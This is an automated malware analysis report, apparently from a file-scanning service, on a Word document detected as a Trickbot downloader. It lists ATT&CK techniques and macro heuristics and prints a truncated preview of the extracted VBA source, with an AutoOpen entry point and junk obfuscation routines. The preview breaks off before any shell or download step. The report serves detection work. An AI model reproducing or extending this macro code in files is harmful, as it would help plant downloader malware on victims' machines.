MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Win.Downloader.Trickbot-6344490-1, strongly suggesting the Trickbot family. Static analysis reveals the presence of VBA macros, including an autoopen macro, and a critical 'Shell()' call, indicating the execution of arbitrary code. This functionality is consistent with a downloader designed to fetch and execute additional malicious components.
Heuristics 6
-
ClamAV: Win.Downloader.Trickbot-6344490-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Downloader.Trickbot-6344490-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10426 bytes |
SHA-256: b0cfb77a9e68a90dc4849797b816df475a9b86c3725f7bcfc633b0f8f3a7777c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() myfunc2 End Sub Attribute VB_Name = "Module1" Function generateFuncName() Randomize countSymbols = CInt(Int((9 * Rnd()) + 4)) symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1)) gName = Mid(FS, symbolRand, 1) For i = 2 To countSymbols - 1 symbolRand = CInt(Int(((Len(MS1) + 1) * Rnd()) + 1)) gName = gName + Mid(MS1, symbolRand, 1) Next i symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1)) gName = gName + Mid(LS, symbolRand, 1) generateFuncName = gName End Function Attribute VB_Name = "Module2" Function myfunc2() myform1.TextBox1 = "234" End Function Attribute VB_Name = "Module3" Function createTextString(str) UserForm2.MyText = str End Function Attribute VB_Name = "Module4" Sub puta10() If 776 = 515 Then Dim ypost ypost = True Dim amyp amyp = True Rem fjhfgktu End If End Sub Attribute VB_Name = "Module5" Sub puta8() Select Case "obowwa" Case "gtappp" ' igcik igjo bqafy eca orosz igumina coj Rem bmofpibuty yfajaplewc gikcadwasz fom End Select End Sub Attribute VB_Name = "Module6" Sub puta7() Select Case 307 Case 445 Rem urroznohtobq ytfyqowa uwi Rem ltot fkufa vycoxcale Dim zyfsyc zyfsyc = True Dim bilmolra bilmolra = #6/3/1968# Case 513 Dim ivkazre ivkazre = False End Select End Sub Attribute VB_Name = "Module7" Sub puta6() If 437 = 810 Then Dim adoljedw adoljedw = "3388" Dim inelowj inelowj = "2827" End If End Sub Attribute VB_Name = "Module8" Sub puta9() If 514 = 484 Then Dim avniv avniv = "8253" End If End Sub Attribute VB_Name = "Module9" Sub puta5() Select Case 335 Case 355 Dim zzuwjybd zzuwjybd = True Case 238 Rem haputgiwk qymybij cejexc zojenxu ulgiqdykk zurb emyksemce Rem zzeqmy ozybjo voxtisu xxolqygkuxu duqok akti xawvy Case 260 Dim innoff innoff = True Dim nmiflu nmiflu = "cy" End Select End Sub Attribute VB_Name = "Module10" Sub puta4() Select Case "ebg" Case "pe" Dim evise evise = #9/2/1955# Dim nxazed nxazed = 3354 Dim ymcipd ymcipd = "3979" Rem ibmatl vhahq awehli vlewkytzovw Case "fego" Dim nkyfe nkyfe = "utn" Rem ojytceni Case "agam" Dim evaxsa evaxsa = False Dim mezuks mezuks = #11/18/1967# Dim rsesziz rsesziz = #5/18/1977# End Select End Sub Attribute VB_Name = "Module11" Sub puta3() Select Case "ikg" Case "mmuxweb" ' ajrewolbyvv egelma oxwa uloccutpu jajo uwpyrryten Dim ivgekm ivgekm = #10/23/1973# Rem mseruzvi ozmagi ekykpobh ybxuj apfyqnyzgu cokuju onjacqull End Select End Sub Attribute VB_Name = "Module12" Function LS() LS = UserForm1.lastSymbol End Function Function LLS() LLS = Len(LS) End Function Function FS() FS = myform1.firstSymbol End Function Function LFS() LFS = Len(FS) End Function Function MS1() MS1 = UserForm1.middleSymbol1 End Function Function MS2() MS2 = UserForm1.middleSymbol2 End Function Attribute VB_Name = "Module13" Function generateFileName1() Randomize countSymbols = CInt(Int((9 * Rnd()) + 4)) symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1)) gn = Mid(FS, symbolRand, 1) For i = 2 To countSymbols - 1 symbolRand = CInt(Int(((Len(MS2) + 1) * Rnd()) + 1)) gn = gn + Mid(MS2, symbolRand, 1) Next i symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1)) gn = gn + Mid(LS, symbolRand, 1) generateFileName1 = gn End Function Attribute VB_Name = "Module14" Function generateArgName() Randomize countSymbols = CInt(Int((9 * Rnd()) + 4)) symbolRand = CInt(Int(((LFS + 1) * Rnd()) + 1)) gName = Mid(FS, symbolRand, 1) For i = 2 To countSymbols - 1 symbolRand = CInt(Int(((Len(MS1) + 1) * Rnd()) + 1)) gName = gName + Mid(MS1, symbolRand, 1) Next i symbolRand = CInt(Int(((LLS + 1) * Rnd()) + 1)) gName = gName + Mid(LS, symbolRand, 1) generateArgName = gName End Function Attribute VB_Name = "myform1" Attribu ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.